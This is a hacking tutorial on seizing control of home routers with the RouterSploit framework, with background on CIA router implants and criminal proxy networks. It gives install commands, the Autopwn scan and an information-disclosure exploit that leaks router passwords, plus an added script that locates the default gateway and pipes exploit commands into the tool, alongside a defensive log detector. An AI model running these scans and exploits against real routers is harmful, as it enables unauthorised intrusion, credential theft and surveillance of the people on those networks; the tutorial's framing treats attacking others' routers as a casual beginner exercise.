How To: Seize Control of a Router with RouterSploit

A router is the core of anyone's internet experience, but sadly most people don't spend much time setting up this critical piece of hardware. Old firmware, default passwords, and other configuration issues continue to haunt many organizations. Exploiting the poor, neglected computer inside these routers has become so popular and easy that automated tools have been created to make the process a breeze.

In this hacking tutorial, we'll learn how to use RouterSploit, a tool for automating the process of router exploitation. But before we dive right in, let's get a little background information on the tools available and why router exploitation is so big.

The Basics Behind Router Exploitation

Router exploitation usually starts from the router's own network: the attacker either breaks the Wi-Fi security or is already a client on it, then bypasses the administrative login page (through a vulnerability, a default password, or brute force) and gains access to the management interface. A skilled attacker can then target the firmware that runs the router in a practice called "rootkitting," in which custom firmware is flashed onto the router to enable advanced malicious features that survive a reboot.

Depending on the goals and resources of an attacker, this can include spying on the user and any connected devices, injecting malware into the browser to exploit connected devices, enabling advanced spear phishing attacks, and routing illegal traffic for criminal activities through exploited routers.

Government Router Hacking with Cherry Blossom

Government agencies like the NSA and CIA hoard exploits for routers, and the Shadow Brokers have threatened to release more of the NSA's exploits on the heels of the Windows SMB leak that spawned WannaCry. If they follow through with the threat to leak router exploits in June, tools like Cherry Blossom (a CIA framework documented in WikiLeaks' Vault 7 release) could become mainstream.

These tools from the NSA and CIA control entire networks of infected routers, transforming them into advanced, on-site wireless espionage devices. Why plant a fancy spying device when you can just turn a home router into one?

Cherry Blossom is a rootkitting master framework, in which routers are automatically exploited and converted into "flytraps." A flytrap is a router that has been compromised and updated with special firmware that prevents the user from updating or modifying the new firmware.

Cherry Blossom can control many "flytraps," providing instant access to advanced spying devices located in the home or workplace of a target. Image via Cherry Blossom Quick Start Guide / WikiLeaks / CIA

The flytrap establishes a "beacon" back to a command-and-control server called "Cherryweb," and is then assigned "missions" by an operator via an encrypted VPN tunnel. Advanced modules, like "Windex," which performs a drive-by malware injection attack against any connected target, can turn a flytrap into an advanced remote espionage platform capable of being controlled from anywhere.

Cherry Blossom displaying mission commands to be sent to flytrap devices, including shell code, recon scripts, and exploits. Some poor guy is going to get his Cherry Blossomed. Image via Cherry Blossom Quickstart Guide / WikiLeaks / CIA

Criminal IoT & Router Hacking

Aside from the espionage application the CIA focuses on, exploitable routers and IoT devices are commonly targeted because of their routing ability. RouterSploit, the tool we're working with today, doesn't just compromise routers, it can also go after webcams and other connected devices.

While the CIA uses VPN connections to hide traffic to and from command-and-control servers, cyber criminals will use these devices to proxy malicious traffic to avoid detection. In fact, networks of these infected routers and IoT devices are sold as black market proxies for hiding illegal activity like credit card theft, darknet transactions, and DDoS attacks. By failing to secure your router, you could be signing up to relay traffic for criminal hacking enterprises.

Most people set up routers and forget about them, failing to change the default setting, update the firmware, or otherwise protect them. Image by nito500/123RF

Beginner Router Hacking

While simply trying the default password is the first step towards router exploitation, more advanced frameworks exist even for beginners. Why would a beginner want to exploit a router? On a local level, if you fully compromise the router, you will have complete access to the network. This allows you to control and route the target's internet experience to wherever or whatever you want or forward ports for remote access.

You should consider a router an early and productive target in the first stages of an engagement. Even if you're a beginner, running the Autopwn scanner in RouterSploit will automatically test a range of vulnerability checks against a target IP address, reducing the process of finding a candidate exploit to a matter of seconds.

What Is RouterSploit?

RouterSploit is a handy Python program which automates most of the tasks associated with compromising a router. Modeled after Metasploit, its commands will be familiar to anyone used to the Metasploit framework. It contains scanning and exploit modules and is available for Kali Linux (and macOS or Mac OS X if you want).

Once you associate to a target network, running a scan will reveal whether a router can be easily exploited through the framework. Today, we will be going over the Autopwn feature to quickly identify vulnerabilities on routers and connected devices.

The RouterSploit exploit framework landing page, with options for Autopwn present.

Getting It Running — What You'll Need

RouterSploit is great because it runs on Kali Linux, our Kali Raspberry Pi, macOS or Mac OS X, Windows, and even on an unrooted Android phone. To start, we'll need to take care of some dependencies and ensure Python is installed. Aside from that, compromising a router has never been easier from any device you have handy.

Step 1: Installing Dependencies

To proceed, we'll need to ensure we have Python installed. You'll need the following Python packages:

  • gnureadline (macOS / Mac OS X only)
  • requests
  • paramiko
  • beautifulsoup4
  • pysnmp

These are Python packages, not Debian packages, so they are installed with pip rather than apt-get (apt-get install requests fails because no package of that name exists). If pip itself is missing, install it first with apt-get install python-pip (python3-pip on current releases). Then type:

pip install requests paramiko beautifulsoup4 pysnmp

On macOS, add gnureadline to that list.
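Missing dependencies are the most common reason rsf.py dies on startup with an ImportError (see the comments below). As an added example that is not part of RouterSploit or this tutorial's original code, the following preflight script checks the packages listed above and prints the pip command for whatever is missing. It assumes the standard import names for those packages; note that beautifulsoup4 is imported as bs4, which trips up a simple "is requests installed" check.

```python
"""Preflight check for RouterSploit's Python dependencies.

Added example for this tutorial, not part of RouterSploit itself. It maps the
pip package names from Step 1 to the module names they are imported under,
reports which ones are missing, and builds a pip command for only those.
"""
import importlib.util
import sys

# pip package name -> importable module name. beautifulsoup4 is imported as
# "bs4"; that mismatch is why a naive check by pip name gives wrong answers.
REQUIRED = {
    "requests": "requests",
    "paramiko": "paramiko",
    "beautifulsoup4": "bs4",
    "pysnmp": "pysnmp",
}
# gnureadline is only needed on macOS, where the system readline is libedit.
MACOS_ONLY = {"gnureadline": "gnureadline"}


def missing_packages(required, platform=None):
    """Return the sorted pip names of packages whose module cannot be found."""
    platform = sys.platform if platform is None else platform
    wanted = dict(required)
    if platform == "darwin":
        wanted.update(MACOS_ONLY)
    return sorted(
        pip_name for pip_name, module in wanted.items()
        if importlib.util.find_spec(module) is None
    )


def install_command(missing, use_sudo=False):
    """Build the pip command for the missing packages, or None if nothing is missing."""
    if not missing:
        return None
    cmd = ["pip", "install"] + list(missing)
    if use_sudo:
        cmd.insert(0, "sudo")
    return " ".join(cmd)


if __name__ == "__main__":
    missing = missing_packages(REQUIRED)
    if missing:
        print("missing:", ", ".join(missing))
        print("run:", install_command(missing))
        sys.exit(1)
    print("all RouterSploit dependencies present")
```

Run it from any directory before starting rsf.py; a non-zero exit means something is missing, and the printed command installs exactly that.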

Step 2: Installing on OS X, Kali Linux & Others

To install on Kali Linux, open a terminal window and type:

git clone https://github.com/reverse-shell/routersploit
cd routersploit
pip install -r requirements.txt
./rsf.py

On macOS or Mac OS X, the method is similar. In a terminal window, type:

git clone https://github.com/reverse-shell/routersploit
cd routersploit
sudo easy_install pip
sudo pip install -r requirements.txt

Step 3: Running RouterSploit

For our first run, connect your computer to a network with a router you'd like to scan. Navigate to the RouterSploit folder and run RouterSploit by typing:

cd
cd routersploit
sudo python ./rsf.py

The RouterSploit framework bears a striking similarity to the Metasploit framework, both in interface style and workflow. A command-line interface lets you input simple commands to scan and exploit routers, and you can see everything RouterSploit has to offer by typing:

show all

Lots of exploits, default creds, and scanners! How fun. To begin, we'll start with a scan against a target router, which runs the check routine of every exploit module against it. At the end of the scan it returns a list of every module whose check reported the target as vulnerable, so no research is required to find candidates. A check can also come back as "could not be verified," which means it was inconclusive, not that the exploit will work.

Step 4: Scanning a Target

We will be using the Autopwn scanner to find any vulnerabilities that apply to our target. Locate the IP address of the router and save it, because we'll need to input it shortly. Most of the time, the router is at 192.168.0.1 or 192.168.1.1, but this can vary; on Linux, ip route lists it as the default gateway. You can use Fing or arp-scan to find the IP address if you don't know it.

After starting RouterSploit, enter the Autopwn module by typing:

use scanners/autopwn
show options

This is very similar to Metasploit. To get around, type use and then whatever module you want to use, show options to show the variables of that module you've selected, set to set any of the variables you see from the show options command, and finally, run to execute the module. Pretty simple. To leave the module and return to the main prompt, type back; exit quits RouterSploit entirely.

In this case, we will set the target to the IP address of the router. Type set target and then the IP address of the router, then press enter. Finally, type run to begin the scan.

Step 5: Selecting & Configuring the Exploit

After the scan is complete, we'll be left with a list of vulnerabilities it finds. We can pick from this list to decide which exploit best suits our needs.

Here, we see a router with many vulnerabilities. Let's start with a simple exploit, some revealing information disclosure.

To use this exploit, we'll enter the following:

use exploits/routers/3com/3cradsl72_info_disclosure
show options

A list of the variables will come up, and you'll be able to set your target by typing:

set target <target router IP>
check

This sets the target, and check runs the module's vulnerability test without firing the exploit. It will report that the target is vulnerable, is not vulnerable, or could not be verified; only the first is a green light.

Step 6: Running the Exploit

The target looks good and vulnerable. To fire the payload, type run.

If the exploit is successful, you should be greeted with internal configuration settings that can leak the login and password of users, default passwords, and device serial number, among other settings that allow you to compromise the router. Other modules allow you to remotely inject code or directly disclose the router password. Which you can run depends on what the target router is vulnerable to.
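To tie Steps 4 through 6 together, here is an added example script that is not part of RouterSploit or this tutorial's original code. It finds the router's address from the output of ip route (on a home network the default gateway is almost always the router) and builds the exact interpreter commands typed above, so the Autopwn scan or a single exploit's check and run can be driven without retyping them. The sample routing table is constructed, and the assumption that rsf.py accepts its commands from standard input is mine, not a guarantee from the project; if it does not, paste the printed lines into the prompt instead.

```python
"""Scripting the Steps 4 to 6 workflow around rsf.py.

Added example for this tutorial, not RouterSploit's own code. It parses
`ip route` text to find the default gateway, then builds the interpreter
commands the tutorial types by hand. Assumption: rsf.py reads commands from
standard input, so the list can be piped into it.
"""
import re
import subprocess

# Constructed sample of `ip route` output from a laptop on a home Wi-Fi network.
SAMPLE_IP_ROUTE = """\
default via 192.168.0.1 dev wlan0 proto dhcp metric 600
172.17.0.0/16 dev docker0 proto kernel scope link src 172.17.0.1 linkdown
192.168.0.0/24 dev wlan0 proto kernel scope link src 192.168.0.37 metric 600
"""

_DEFAULT_ROUTE = re.compile(r"^default via (\d{1,3}(?:\.\d{1,3}){3}) dev (\S+)", re.M)


def default_gateway(ip_route_output):
    """Return (gateway_ip, interface) from `ip route` text, or None if there is no default route."""
    m = _DEFAULT_ROUTE.search(ip_route_output)
    return (m.group(1), m.group(2)) if m else None


def session_commands(module, target, check_first=False):
    """Interpreter commands for one module: the Autopwn scan (Step 4), or an
    exploit with check before run (Steps 5 and 6). Ends with exit so a piped
    session terminates instead of hanging at end of input."""
    cmds = [f"use {module}", f"set target {target}", "show options"]
    if check_first:
        cmds.append("check")
    cmds += ["run", "exit"]
    return cmds


def run_rsf(commands, rsf_dir="routersploit", python="python"):
    """Pipe the commands into rsf.py and return its output. Needs a RouterSploit
    checkout, network access, and a target you are authorised to test."""
    proc = subprocess.run(
        [python, "rsf.py"], cwd=rsf_dir,
        input="\n".join(commands) + "\n", capture_output=True, text=True,
    )
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    try:
        live = subprocess.run(["ip", "route"], capture_output=True, text=True).stdout
    except FileNotFoundError:  # no iproute2 on this box; fall back to the sample
        live = ""
    gw = default_gateway(live) or default_gateway(SAMPLE_IP_ROUTE)
    print("router candidate:", gw[0], "on", gw[1])
    print("\n".join(session_commands("scanners/autopwn", gw[0])))
    print("\n".join(session_commands(
        "exploits/routers/3com/3cradsl72_info_disclosure", gw[0], check_first=True)))
```

The script only prints the command list by default; call run_rsf() with that list from inside a RouterSploit checkout to actually execute it. Keep in mind that a piped session cannot branch on the check result, so read the output before trusting a run.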

Warnings

This intro should get you familiar with running RouterSploit to compromise a router, now you can start using other modules and experimenting with different kinds of exploits. Although Autopwn is a convenient feature, it tries a lot of different exploits and thus is very noisy on the network. The preferred option is to scan your target, do some recon, and only run the relevant modules for the manufacturer of the target router. While exploiting routers might be trendy, keep in mind doing so on someone else's router without permission is a crime. Unless you're the CIA.
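That noise is also what a defender sees. As an added example (the defender's side; not part of RouterSploit or this tutorial's original code), here is a small detector that runs over constructed access-log lines from a router's web admin interface and flags a client that requests many distinct, mostly non-existent paths within a few seconds, which is what an Autopwn run against the HTTP service looks like from the router's point of view. The log lines, the time window and the thresholds are all assumptions to tune per device; RouterSploit's real request paths and User-Agent are not reproduced here.

```python
"""Spotting an Autopwn-style burst in a router's web access log.

Added example for this tutorial (defender's side, not RouterSploit code).
Autopwn fires many exploit checks at one host in quick succession; in an
HTTP log that is one client requesting dozens of unrelated, mostly 404 admin
paths within seconds. The log below is constructed in common log format.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample: normal admin browsing from .37, then a burst from .50.
SAMPLE_LOG = """\
192.168.0.37 - - [10/Jun/2017:21:02:11 +0000] "GET /index.html HTTP/1.1" 200 5123
192.168.0.37 - - [10/Jun/2017:21:02:13 +0000] "GET /status.cgi HTTP/1.1" 200 812
192.168.0.50 - - [10/Jun/2017:21:05:01 +0000] "GET /cgi-bin/webproc HTTP/1.1" 404 162
192.168.0.50 - - [10/Jun/2017:21:05:01 +0000] "GET /app/app.config HTTP/1.1" 404 162
192.168.0.50 - - [10/Jun/2017:21:05:02 +0000] "GET /rom-0 HTTP/1.1" 404 162
192.168.0.50 - - [10/Jun/2017:21:05:02 +0000] "GET /password.cgi HTTP/1.1" 404 162
192.168.0.50 - - [10/Jun/2017:21:05:03 +0000] "POST /goform/formLogin HTTP/1.1" 404 162
192.168.0.50 - - [10/Jun/2017:21:05:03 +0000] "GET /cgi-bin/firmwarecfg HTTP/1.1" 404 162
192.168.0.50 - - [10/Jun/2017:21:05:04 +0000] "GET /hndUnblock.cgi HTTP/1.1" 404 162
192.168.0.50 - - [10/Jun/2017:21:05:04 +0000] "GET /login.cgi HTTP/1.1" 200 1490
192.168.0.50 - - [10/Jun/2017:21:05:05 +0000] "GET /setup.cgi?next_file=passwd HTTP/1.1" 404 162
192.168.0.50 - - [10/Jun/2017:21:05:05 +0000] "GET /tmUnblock.cgi HTTP/1.1" 404 162
192.168.0.37 - - [10/Jun/2017:21:06:40 +0000] "GET /status.cgi HTTP/1.1" 200 812
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+'
)


def parse_log(text):
    """Return (src, timestamp, path-without-query, status) per well-formed line."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip truncated or foreign lines rather than crash
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append((m["src"], ts, m["path"].split("?")[0], int(m["status"])))
    return events


def find_scan_bursts(events, window_s=30, min_paths=8, min_404_ratio=0.5):
    """Flag sources that hit at least min_paths distinct paths inside any
    window_s-second window with a 404 share of at least min_404_ratio.
    Returns {src: (distinct_paths, not_found_ratio)} for the widest such window."""
    by_src = defaultdict(list)
    for src, ts, path, status in events:
        by_src[src].append((ts, path, status))
    hits = {}
    for src, evs in by_src.items():
        evs.sort()
        best = None
        lo = 0
        for hi in range(len(evs)):
            while (evs[hi][0] - evs[lo][0]).total_seconds() > window_s:
                lo += 1  # slide the window start forward
            win = evs[lo:hi + 1]
            paths = {p for _, p, _ in win}
            not_found = sum(1 for _, _, s in win if s == 404) / len(win)
            if (len(paths) >= min_paths and not_found >= min_404_ratio
                    and (best is None or len(paths) > best[0])):
                best = (len(paths), round(not_found, 2))
        if best:
            hits[src] = best
    return hits


if __name__ == "__main__":
    for src, (n, ratio) in find_scan_bursts(parse_log(SAMPLE_LOG)).items():
        print(f"{src}: {n} distinct paths in one window, {ratio:.0%} not found")
```

The thresholds matter: a legitimate admin clicking through the web UI produces a handful of existing pages over minutes, while a scanner produces many unknown paths in seconds. Raising min_paths trades missed small scans for fewer false positives on busy interfaces.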

You can ask me questions here or @sadmin2001 on Twitter or Instagram.

Cover photo and screenshots by SADMIN/Null Byte

15 Comments

Great tutorial.
Happy to see that the community is still alive.
XD

Thank you!

Maybe I'm stupid to ask this question,
but do I have to log in and connect to the target Wi-Fi to exploit it?
Thanks

Hey! Yes, you must be connected to the wifi

At ./rsf.py I get the message: "ImportError: No module named requests"
Any fixes?

Run: sudo apt-get install python-pip and: sudo pip install requests

Hey SADMIN :)

Just made an account after touring the site for months, you guys helped a fresh HS Grad find his passion and future career path, I thank you greatly! Now onto my question(for anyone to answer really).

In the event that a router has been compromised via Routersploit, would the person in control hypothetically be able to access computers connected to it without any user input. For instance, if someone were to break into my router while I was at school, could they break into my IP security cameras, or other web-cams/ or even computers (without any interaction from me) and then be able to watch me walk in the front door? I may be misguided but It seems like so long as I personally do not download anything malicious or go to any suspicious websites I should be in the clear?

Hey!

To use routersploit, you must have already broken the Wi-Fi password. Once you have the Wi-Fi password, any device connected to the network can be scanned if it is not isolated to its own subnet. You can attempt to crack the password of any device you see on the network. Owning the router definitely makes the situation worse, but it isn't necessary for doing what you suggest.

Thank you for the response :)

Hey,
You said it can run on an unrooted Android. How do I do that?
Can you please help me out.
:)

Yep! I'm releasing a tutorial this week

I mean now

What does it mean if, instead of saying the device is vulnerable or not, it says it could not be verified?

It means it was not able to confirm or deny the vulnerability, which isn't great. You can try it, but it probably won't work.

Hi guys. After getting a vulnerability,
Exploits/router/huawei/hg520 info_disclosure,
and using that exploit, an error saying module hg520 not found appears. Please help, sadmin.
